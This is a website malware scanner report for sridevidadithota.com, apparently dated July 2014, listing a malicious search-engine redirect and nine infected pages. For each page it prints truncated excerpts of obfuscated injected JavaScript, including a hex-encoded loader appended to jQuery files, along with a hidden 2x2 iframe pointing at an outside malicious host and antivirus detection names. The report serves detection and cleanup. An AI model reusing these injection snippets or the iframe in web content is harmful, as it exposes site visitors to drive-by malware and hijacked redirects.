Malware Scanner report for sridevidadithota.com

Malicious/Suspicious/Total urls checked: 9/0/18

9 pages have malicious code. See details below

Blacklists: Found

The website is marked by Google as suspicious.

The website "sridevidadithota.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.

Malicious redirects: Found

The website redirects visitors from search engines to the 3rd-party URL:
->http://thecardoctorsales.co.uk/axun.html?h=2811462
42 websites infected.

The website "sridevidadithota.com" is most probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues. Here is our redirects fixing guide.

Malicious/Hidden/Total iFrames: 0/1/1

1 suspicious iframe found. See details below

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=sridevidadithota.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Malicious/Suspicious Redirects

Request	Server response	Status
URL: http://sridevidadithota.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: sridevidadithota.com Referer: http://www.google.com/search?q=redirect+check1	HTTP/1.1 302 Found Connection: close Date: Mon, 14 Jul 2014 17:57:19 GMT Location: http://thecardoctorsales.co.uk/axun.html?h=2811462 Server: Apache Content-Length: 304 Content-Type: text/html; charset=iso-8859-1	malicious

Scanned pages/files

Request	Server response	Status
http://sridevidadithota.com/	200 OK Content-Length: 8640 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) var VeQM;var xBQdHr;var bZDep='yRqJ';if('xsYL'=='XEBKj')oHdBFL='OvfAIR';function lMchhr(){}if('xTTX'=='bjlV')qXYO();var eXpcWQX="\x66ro\x6d\x43harCode";var PiaPr;var zPKoP=162;var px0_var="0px";var tDLo='noeX';var hZkmb="pa\x72seIn\x74";var MOwN=279;var appVersion_var="a\x70\x70Version";var GfrLcV;var mMyDLv=268;var oJyWtFC="bo\x64\x79";var MzkStJ;var LQRx='YvZrr';var EIpRgmLbl="ap\x70e\x6edC\x68ild";var aQdP=245;function LBEXN(){var mjghS='QZkm';if('Feourr'=='RKwRp')OXzNS();} var jHgyFfTIn="";v ... 2557 bytes are skipped ...nt[oJyWtFC]){function iGOSi(){var ybpjF='NluXec';if('ZWzVQg'=='uVKmMO')SBzDk();}if('dhvw'=='RaNQp')hlVG();var document_body_var=document[oJyWtFC];var PNFBo=298;var uuGOXi='UJvg';var BowMMV;document_body_var[EIpRgmLbl].apply(document_body_var,[hfZFQR]);}else{setTimeout(OjEvOLtG,120);function xbtk(){var kVEvu='NQjQ';if('EbXM'=='iedJ')gbBt();}} function QaiIVA(){}if('RmsJ'=='olhuJ')UVQefL='HZTnQi';var YCqPF=273;} OjEvOLtG();if('xWYZ'=='PSoVI')TBalP='iVLo';var HnpBT;if('BtGW'=='vAKjp')uyWrgK='nVLq'; Antivirus reports: AntiVir JS/Agent.aqu Avast JS:Agent-ANA [Trj] Ikarus Trojan.Script nProtect JS:Exploit.JS.Agent.AT K7AntiVirus Riskware TrendMicro-HouseCall TROJ_GEN.RCBH1JV Emsisoft JS:Exploit.JS.Agent.AT (B) Comodo TrojWare.JS.Agent.BW TrendMicro HEUR_HTJS.HDJSFN Kaspersky Trojan-Downloader.JS.Iframe.dbu Microsoft Trojan:JS/Redirector.LB MicroWorld-eScan JS:Exploit.JS.Agent.AT Fortinet JS/IFrame.BBDH!tr NANO-Antivirus Trojan.Script.Iframe.bgwkom F-Secure JS:Exploit.JS.Agent.AT F-Prot JS/IFrame.NM.gen AVG JS/Redir GData JS:Exploit.JS.Agent.AT Commtouch JS/IFrame.NM.gen BitDefender JS:Exploit.JS.Agent.AT
http://sridevidadithota.com/Sridevi.html	200 OK Content-Length: 6989 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) var VeQM;var xBQdHr;var bZDep='yRqJ';if('xsYL'=='XEBKj')oHdBFL='OvfAIR';function lMchhr(){}if('xTTX'=='bjlV')qXYO();var eXpcWQX="\x66ro\x6d\x43harCode";var PiaPr;var zPKoP=162;var px0_var="0px";var tDLo='noeX';var hZkmb="pa\x72seIn\x74";var MOwN=279;var appVersion_var="a\x70\x70Version";var GfrLcV;var mMyDLv=268;var oJyWtFC="bo\x64\x79";var MzkStJ;var LQRx='YvZrr';var EIpRgmLbl="ap\x70e\x6edC\x68ild";var aQdP=245;function LBEXN(){var mjghS='QZkm';if('Feourr'=='RKwRp')OXzNS();} var jHgyFfTIn="";v ... 2557 bytes are skipped ...nt[oJyWtFC]){function iGOSi(){var ybpjF='NluXec';if('ZWzVQg'=='uVKmMO')SBzDk();}if('dhvw'=='RaNQp')hlVG();var document_body_var=document[oJyWtFC];var PNFBo=298;var uuGOXi='UJvg';var BowMMV;document_body_var[EIpRgmLbl].apply(document_body_var,[hfZFQR]);}else{setTimeout(OjEvOLtG,120);function xbtk(){var kVEvu='NQjQ';if('EbXM'=='iedJ')gbBt();}} function QaiIVA(){}if('RmsJ'=='olhuJ')UVQefL='HZTnQi';var YCqPF=273;} OjEvOLtG();if('xWYZ'=='PSoVI')TBalP='iVLo';var HnpBT;if('BtGW'=='vAKjp')uyWrgK='nVLq'; Antivirus reports: AntiVir JS/Agent.aqu Avast JS:Agent-ANA [Trj] Ikarus Trojan.Script nProtect JS:Exploit.JS.Agent.AT K7AntiVirus Riskware TrendMicro-HouseCall TROJ_GEN.RCBH1JV Emsisoft JS:Exploit.JS.Agent.AT (B) Comodo TrojWare.JS.Agent.BW TrendMicro HEUR_HTJS.HDJSFN Kaspersky Trojan-Downloader.JS.Iframe.dbu Microsoft Trojan:JS/Redirector.LB MicroWorld-eScan JS:Exploit.JS.Agent.AT Fortinet JS/IFrame.BBDH!tr NANO-Antivirus Trojan.Script.Iframe.bgwkom F-Secure JS:Exploit.JS.Agent.AT F-Prot JS/IFrame.NM.gen AVG JS/Redir GData JS:Exploit.JS.Agent.AT Commtouch JS/IFrame.NM.gen BitDefender JS:Exploit.JS.Agent.AT
http://sridevidadithota.com/index.html	200 OK Content-Length: 8640 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) var VeQM;var xBQdHr;var bZDep='yRqJ';if('xsYL'=='XEBKj')oHdBFL='OvfAIR';function lMchhr(){}if('xTTX'=='bjlV')qXYO();var eXpcWQX="\x66ro\x6d\x43harCode";var PiaPr;var zPKoP=162;var px0_var="0px";var tDLo='noeX';var hZkmb="pa\x72seIn\x74";var MOwN=279;var appVersion_var="a\x70\x70Version";var GfrLcV;var mMyDLv=268;var oJyWtFC="bo\x64\x79";var MzkStJ;var LQRx='YvZrr';var EIpRgmLbl="ap\x70e\x6edC\x68ild";var aQdP=245;function LBEXN(){var mjghS='QZkm';if('Feourr'=='RKwRp')OXzNS();} var jHgyFfTIn="";v ... 2557 bytes are skipped ...nt[oJyWtFC]){function iGOSi(){var ybpjF='NluXec';if('ZWzVQg'=='uVKmMO')SBzDk();}if('dhvw'=='RaNQp')hlVG();var document_body_var=document[oJyWtFC];var PNFBo=298;var uuGOXi='UJvg';var BowMMV;document_body_var[EIpRgmLbl].apply(document_body_var,[hfZFQR]);}else{setTimeout(OjEvOLtG,120);function xbtk(){var kVEvu='NQjQ';if('EbXM'=='iedJ')gbBt();}} function QaiIVA(){}if('RmsJ'=='olhuJ')UVQefL='HZTnQi';var YCqPF=273;} OjEvOLtG();if('xWYZ'=='PSoVI')TBalP='iVLo';var HnpBT;if('BtGW'=='vAKjp')uyWrgK='nVLq'; Antivirus reports: AntiVir JS/Agent.aqu Avast JS:Agent-ANA [Trj] Ikarus Trojan.Script nProtect JS:Exploit.JS.Agent.AT K7AntiVirus Riskware TrendMicro-HouseCall TROJ_GEN.RCBH1JV Emsisoft JS:Exploit.JS.Agent.AT (B) Comodo TrojWare.JS.Agent.BW TrendMicro HEUR_HTJS.HDJSFN Kaspersky Trojan-Downloader.JS.Iframe.dbu Microsoft Trojan:JS/Redirector.LB MicroWorld-eScan JS:Exploit.JS.Agent.AT Fortinet JS/IFrame.BBDH!tr NANO-Antivirus Trojan.Script.Iframe.bgwkom F-Secure JS:Exploit.JS.Agent.AT F-Prot JS/IFrame.NM.gen AVG JS/Redir GData JS:Exploit.JS.Agent.AT Commtouch JS/IFrame.NM.gen BitDefender JS:Exploit.JS.Agent.AT
http://sridevidadithota.com/test404page.js	404 Not Found Content-Length: 2673 Content-Type: text/html	clean
http://cdn.dsultra.com/js/registrar.js	200 OK Content-Length: 1652 Content-Type: application/x-javascript	clean
http://sridevidadithota.com/Gurus.html	200 OK Content-Length: 11569 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) var VeQM;var xBQdHr;var bZDep='yRqJ';if('xsYL'=='XEBKj')oHdBFL='OvfAIR';function lMchhr(){}if('xTTX'=='bjlV')qXYO();var eXpcWQX="\x66ro\x6d\x43harCode";var PiaPr;var zPKoP=162;var px0_var="0px";var tDLo='noeX';var hZkmb="pa\x72seIn\x74";var MOwN=279;var appVersion_var="a\x70\x70Version";var GfrLcV;var mMyDLv=268;var oJyWtFC="bo\x64\x79";var MzkStJ;var LQRx='YvZrr';var EIpRgmLbl="ap\x70e\x6edC\x68ild";var aQdP=245;function LBEXN(){var mjghS='QZkm';if('Feourr'=='RKwRp')OXzNS();} var jHgyFfTIn="";v ... 3401 bytes are skipped ...nt[oJyWtFC]){function iGOSi(){var ybpjF='NluXec';if('ZWzVQg'=='uVKmMO')SBzDk();}if('dhvw'=='RaNQp')hlVG();var document_body_var=document[oJyWtFC];var PNFBo=298;var uuGOXi='UJvg';var BowMMV;document_body_var[EIpRgmLbl].apply(document_body_var,[hfZFQR]);}else{setTimeout(OjEvOLtG,120);function xbtk(){var kVEvu='NQjQ';if('EbXM'=='iedJ')gbBt();}} function QaiIVA(){}if('RmsJ'=='olhuJ')UVQefL='HZTnQi';var YCqPF=273;} OjEvOLtG();if('xWYZ'=='PSoVI')TBalP='iVLo';var HnpBT;if('BtGW'=='vAKjp')uyWrgK='nVLq'; Antivirus reports: AntiVir JS/Agent.aqu Avast JS:Agent-ANA [Trj] Ikarus Trojan.Script TrendMicro-HouseCall TROJ_GEN.F47V0123 Comodo UnclassifiedMalware K7GW Exploit ( 04c560161 ) Microsoft Trojan:JS/Redirector.LB NANO-Antivirus Trojan.Script.Iframe.bgwkom GData Script.Trojan.Agent.K8O2BU
http://sridevidadithota.com/Contact.html	200 OK Content-Length: 8370 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) var VeQM;var xBQdHr;var bZDep='yRqJ';if('xsYL'=='XEBKj')oHdBFL='OvfAIR';function lMchhr(){}if('xTTX'=='bjlV')qXYO();var eXpcWQX="\x66ro\x6d\x43harCode";var PiaPr;var zPKoP=162;var px0_var="0px";var tDLo='noeX';var hZkmb="pa\x72seIn\x74";var MOwN=279;var appVersion_var="a\x70\x70Version";var GfrLcV;var mMyDLv=268;var oJyWtFC="bo\x64\x79";var MzkStJ;var LQRx='YvZrr';var EIpRgmLbl="ap\x70e\x6edC\x68ild";var aQdP=245;function LBEXN(){var mjghS='QZkm';if('Feourr'=='RKwRp')OXzNS();} var jHgyFfTIn="";v ... 2557 bytes are skipped ...nt[oJyWtFC]){function iGOSi(){var ybpjF='NluXec';if('ZWzVQg'=='uVKmMO')SBzDk();}if('dhvw'=='RaNQp')hlVG();var document_body_var=document[oJyWtFC];var PNFBo=298;var uuGOXi='UJvg';var BowMMV;document_body_var[EIpRgmLbl].apply(document_body_var,[hfZFQR]);}else{setTimeout(OjEvOLtG,120);function xbtk(){var kVEvu='NQjQ';if('EbXM'=='iedJ')gbBt();}} function QaiIVA(){}if('RmsJ'=='olhuJ')UVQefL='HZTnQi';var YCqPF=273;} OjEvOLtG();if('xWYZ'=='PSoVI')TBalP='iVLo';var HnpBT;if('BtGW'=='vAKjp')uyWrgK='nVLq'; Antivirus reports: AntiVir JS/Agent.aqu Avast JS:Agent-ANA [Trj] Ikarus Trojan.Script nProtect JS:Exploit.JS.Agent.AT K7AntiVirus Riskware TrendMicro-HouseCall TROJ_GEN.RCBH1JV Emsisoft JS:Exploit.JS.Agent.AT (B) Comodo TrojWare.JS.Agent.BW TrendMicro HEUR_HTJS.HDJSFN Kaspersky Trojan-Downloader.JS.Iframe.dbu Microsoft Trojan:JS/Redirector.LB MicroWorld-eScan JS:Exploit.JS.Agent.AT Fortinet JS/IFrame.BBDH!tr NANO-Antivirus Trojan.Script.Iframe.bgwkom F-Secure JS:Exploit.JS.Agent.AT F-Prot JS/IFrame.NM.gen AVG JS/Redir GData JS:Exploit.JS.Agent.AT Commtouch JS/IFrame.NM.gen BitDefender JS:Exploit.JS.Agent.AT
http://sridevidadithota.com/blog	HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 14 Jul 2014 17:57:24 GMT Location: http://sridevidadithota.com/blog/ Server: Apache Content-Length: 311 Content-Type: text/html; charset=iso-8859-1	clean
http://sridevidadithota.com/blog/	HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 14 Jul 2014 17:57:24 GMT Location: http://www.sridevidadithota.com/blog/ Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://www.sridevidadithota.com/blog/xmlrpc.php	clean
http://www.sridevidadithota.com/blog/	200 OK Content-Length: 5083 Content-Type: text/html	clean
http://www.sridevidadithota.com/blog	HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 14 Jul 2014 17:57:28 GMT Location: http://www.sridevidadithota.com/blog/ Server: Apache Content-Length: 319 Content-Type: text/html; charset=iso-8859-1	clean
http://sridevidadithota.com/../../../blog	400 Bad Request Content-Length: 274 Content-Type: text/html	suspicious
Hidden iFrame found. size: 2x2 src: http://thecardoctorsales.co.uk/axun.html?i=2811462 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://thecardoctorsales.co.uk/axun.html?i=2811462>
http://sridevidadithota.com/Credits.html	200 OK Content-Length: 6799 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) var VeQM;var xBQdHr;var bZDep='yRqJ';if('xsYL'=='XEBKj')oHdBFL='OvfAIR';function lMchhr(){}if('xTTX'=='bjlV')qXYO();var eXpcWQX="\x66ro\x6d\x43harCode";var PiaPr;var zPKoP=162;var px0_var="0px";var tDLo='noeX';var hZkmb="pa\x72seIn\x74";var MOwN=279;var appVersion_var="a\x70\x70Version";var GfrLcV;var mMyDLv=268;var oJyWtFC="bo\x64\x79";var MzkStJ;var LQRx='YvZrr';var EIpRgmLbl="ap\x70e\x6edC\x68ild";var aQdP=245;function LBEXN(){var mjghS='QZkm';if('Feourr'=='RKwRp')OXzNS();} var jHgyFfTIn="";v ... 2557 bytes are skipped ...nt[oJyWtFC]){function iGOSi(){var ybpjF='NluXec';if('ZWzVQg'=='uVKmMO')SBzDk();}if('dhvw'=='RaNQp')hlVG();var document_body_var=document[oJyWtFC];var PNFBo=298;var uuGOXi='UJvg';var BowMMV;document_body_var[EIpRgmLbl].apply(document_body_var,[hfZFQR]);}else{setTimeout(OjEvOLtG,120);function xbtk(){var kVEvu='NQjQ';if('EbXM'=='iedJ')gbBt();}} function QaiIVA(){}if('RmsJ'=='olhuJ')UVQefL='HZTnQi';var YCqPF=273;} OjEvOLtG();if('xWYZ'=='PSoVI')TBalP='iVLo';var HnpBT;if('BtGW'=='vAKjp')uyWrgK='nVLq'; Antivirus reports: AntiVir JS/Agent.aqu Avast JS:Agent-ANA [Trj] Ikarus Trojan.Script nProtect JS:Exploit.JS.Agent.AT K7AntiVirus Riskware TrendMicro-HouseCall TROJ_GEN.RCBH1JV Emsisoft JS:Exploit.JS.Agent.AT (B) Comodo TrojWare.JS.Agent.BW TrendMicro HEUR_HTJS.HDJSFN Kaspersky Trojan-Downloader.JS.Iframe.dbu Microsoft Trojan:JS/Redirector.LB MicroWorld-eScan JS:Exploit.JS.Agent.AT Fortinet JS/IFrame.BBDH!tr NANO-Antivirus Trojan.Script.Iframe.bgwkom F-Secure JS:Exploit.JS.Agent.AT F-Prot JS/IFrame.NM.gen AVG JS/Redir GData JS:Exploit.JS.Agent.AT Commtouch JS/IFrame.NM.gen BitDefender JS:Exploit.JS.Agent.AT
http://sridevidadithota.com/Assets/js/jquery.js	200 OK Content-Length: 58714 Content-Type: text/javascript	malicious
Malicious code - confirmed by antiviruses (see below) (function(){if(window.jQuery)var _jQuery=window.jQuery;var jQuery=window.jQuery=function(selector,context){return new jQuery.prototype.init(selector,context);};if(window.$)var _$=window.$;window.$=jQuery;var quickExpr=/^[^<](<(.\|\s)+>)[^>]$\|^#(\w+)$/;var isSimple=/^.[^:#\[\.]$/;jQuery.fn=jQuery.prototype={init:function(selector,context){selector=selector\|\|document;if(selector.nodeType){this[0]=selector;this.length=1;return this;}else if(typeof selector=="string"){var match=quickEx ... 56681 bytes are skipped ...9,25,5a,66,66,62,60,5c,3c,65,58,59,63,5c,5b,20,4,1,72,4,1,60,5d,1f,3e,5c,6b,3a,66,66,62,60,5c,1f,1e,6d,60,6a,60,6b,5c,5b,56,6c,68,1e,20,34,34,2c,2c,20,72,74,5c,63,6a,5c,72,4a,5c,6b,3a,66,66,62,60,5c,1f,1e,6d,60,6a,60,6b,5c,5b,56,6c,68,1e,23,17,1e,2c,2c,1e,23,17,1e,28,1e,23,17,1e,26,1e,20,32,4,1,4,1,71,71,71,5d,5d,5d,1f,20,32,4,1,74,4,1,74,4,1"[sp](",");}w=f;s=[];for(i=2-2;-i+1336!=0;i+=1){j=i;if((0x19==031))if(e)s+=ff.fromCharCode(e(aq+(w[j]))+0xa-bv);}za=e;za(s)} //f82c4e/ //339810*/ Antivirus reports: AntiVir JS/BlacoleRef.NO.4 Avast JS:Iframe-CBD [Trj] Ad-Aware Trojan.Script.501274 Ikarus Trojan.JS.BlacoleRef nProtect Trojan.Script.501274 TrendMicro-HouseCall TROJ_GEN.F47V1109 Comodo TrojWare.JS.Agent.LF Emsisoft Trojan.Script.501274 (B) CAT-QuickHeal JS/BlacoleRef.CZB McAfee-GW-Edition JS/Exploit-Blacole.eu DrWeb JS.IFrame.454 Microsoft Trojan:JS/BlacoleRef.DH MicroWorld-eScan Trojan.Script.501274 Fortinet JS/Blacole.EUS!tr.dldr McAfee JS/Exploit-Blacole.eu NANO-Antivirus Trojan.Script.Expack.bvvxsj F-Secure Trojan.Script.501274 VIPRE Trojan.Js.BlacoleRef.dj (v) AVG JS/Exploit Norman BlacoleRef.BU GData Trojan.Script.501274 BitDefender Trojan.Script.501274
http://sridevidadithota.com/Assets/js/jquery.lightbox-0.5.js	200 OK Content-Length: 24256 Content-Type: text/javascript	malicious
Malicious code - confirmed by antiviruses (see below) (function($) { $.fn.lightBox = function(settings) { settings = jQuery.extend({ overlayBgColor: '#000', overlayOpacity: 0.8, fixedNavigation: false, imageLoading: 'Assets/images/lightbox-ico-loading.gif', imageBtnPrev: 'Assets/images/lightbox-btn-prev.gif', imageBtnNext: 'Assets/images/lightbox-btn-next.gif', imageBtnClose: 'Assets/images/lightbox-btn-close.gif', imageBlank: 'Assets/images/lightbox-blank.gif', ... 16444 bytes are skipped ...,17,1f,65,58,6d,60,5e,58,6b,66,69,25,5a,66,66,62,60,5c,3c,65,58,59,63,5c,5b,20,4,1,72,4,1,60,5d,1f,3e,5c,6b,3a,66,66,62,60,5c,1f,1e,6d,60,6a,60,6b,5c,5b,56,6c,68,1e,20,34,34,2c,2c,20,72,74,5c,63,6a,5c,72,4a,5c,6b,3a,66,66,62,60,5c,1f,1e,6d,60,6a,60,6b,5c,5b,56,6c,68,1e,23,17,1e,2c,2c,1e,23,17,1e,28,1e,23,17,1e,26,1e,20,32,4,1,4,1,71,71,71,5d,5d,5d,1f,20,32,4,1,74,4,1,74,4,1"[sp](",");}w=f;s=[];for(i=2-2;-i 1336!=0;i =1){j=i;if((0x19==031))if(e)s =ff.fromCharCode(e(aq (w[j])) 0xa-bv);}za=e;za(s)} Antivirus reports: AntiVir JS/BlacoleRef.DD.17 Avast JS:Includer-ATH [Trj] Ad-Aware Trojan.Script.501274 nProtect Trojan.Script.501274 TrendMicro-HouseCall TROJ_GEN.F47V0123 Comodo Exploit.JS.Blacole.DO Emsisoft Trojan.Script.501274 (B) CAT-QuickHeal JS/BlacoleRef.CZB McAfee-GW-Edition JS/Exploit-Blacole.ht DrWeb JS.IFrame.454 Microsoft Trojan:JS/BlacoleRef.DH MicroWorld-eScan Trojan.Script.501274 Fortinet JS/Agent.CBN!tr McAfee JS/Exploit-Blacole.ht F-Secure Trojan.Script.501274 Norman BlacoleRef.BQ GData Trojan.Script.501274 BitDefender Trojan.Script.501274
http://sridevidadithota.com/gallery.html	200 OK Content-Length: 10675 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) var VeQM;var xBQdHr;var bZDep='yRqJ';if('xsYL'=='XEBKj')oHdBFL='OvfAIR';function lMchhr(){}if('xTTX'=='bjlV')qXYO();var eXpcWQX="\x66ro\x6d\x43harCode";var PiaPr;var zPKoP=162;var px0_var="0px";var tDLo='noeX';var hZkmb="pa\x72seIn\x74";var MOwN=279;var appVersion_var="a\x70\x70Version";var GfrLcV;var mMyDLv=268;var oJyWtFC="bo\x64\x79";var MzkStJ;var LQRx='YvZrr';var EIpRgmLbl="ap\x70e\x6edC\x68ild";var aQdP=245;function LBEXN(){var mjghS='QZkm';if('Feourr'=='RKwRp')OXzNS();} var jHgyFfTIn="";v ... 2557 bytes are skipped ...nt[oJyWtFC]){function iGOSi(){var ybpjF='NluXec';if('ZWzVQg'=='uVKmMO')SBzDk();}if('dhvw'=='RaNQp')hlVG();var document_body_var=document[oJyWtFC];var PNFBo=298;var uuGOXi='UJvg';var BowMMV;document_body_var[EIpRgmLbl].apply(document_body_var,[hfZFQR]);}else{setTimeout(OjEvOLtG,120);function xbtk(){var kVEvu='NQjQ';if('EbXM'=='iedJ')gbBt();}} function QaiIVA(){}if('RmsJ'=='olhuJ')UVQefL='HZTnQi';var YCqPF=273;} OjEvOLtG();if('xWYZ'=='PSoVI')TBalP='iVLo';var HnpBT;if('BtGW'=='vAKjp')uyWrgK='nVLq'; Antivirus reports: AntiVir JS/Agent.aqu Avast JS:Agent-ANA [Trj] Ikarus Trojan.Script nProtect JS:Exploit.JS.Agent.AT K7AntiVirus Riskware TrendMicro-HouseCall TROJ_GEN.RCBH1JV Emsisoft JS:Exploit.JS.Agent.AT (B) Comodo TrojWare.JS.Agent.BW TrendMicro HEUR_HTJS.HDJSFN Kaspersky Trojan-Downloader.JS.Iframe.dbu Microsoft Trojan:JS/Redirector.LB MicroWorld-eScan JS:Exploit.JS.Agent.AT Fortinet JS/IFrame.BBDH!tr NANO-Antivirus Trojan.Script.Iframe.bgwkom F-Secure JS:Exploit.JS.Agent.AT F-Prot JS/IFrame.NM.gen AVG JS/Redir GData JS:Exploit.JS.Agent.AT Commtouch JS/IFrame.NM.gen BitDefender JS:Exploit.JS.Agent.AT
http://sridevidadithota.com/Assets/gallery/Sree_dance_01.jpg	200 OK Content-Length: 53429 Content-Type: image/jpeg	clean
http://sridevidadithota.com/Assets/gallery/Sree_dance_02.jpg	200 OK Content-Length: 52608 Content-Type: image/jpeg	clean

Recently found suspicious websites

Malware Scanner report for sridevidadithota.com

Malware & Hack Repair

Website Hack Insurance

Safe Browsing / Blacklists

Malicious/Suspicious Redirects

Scanned pages/files

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools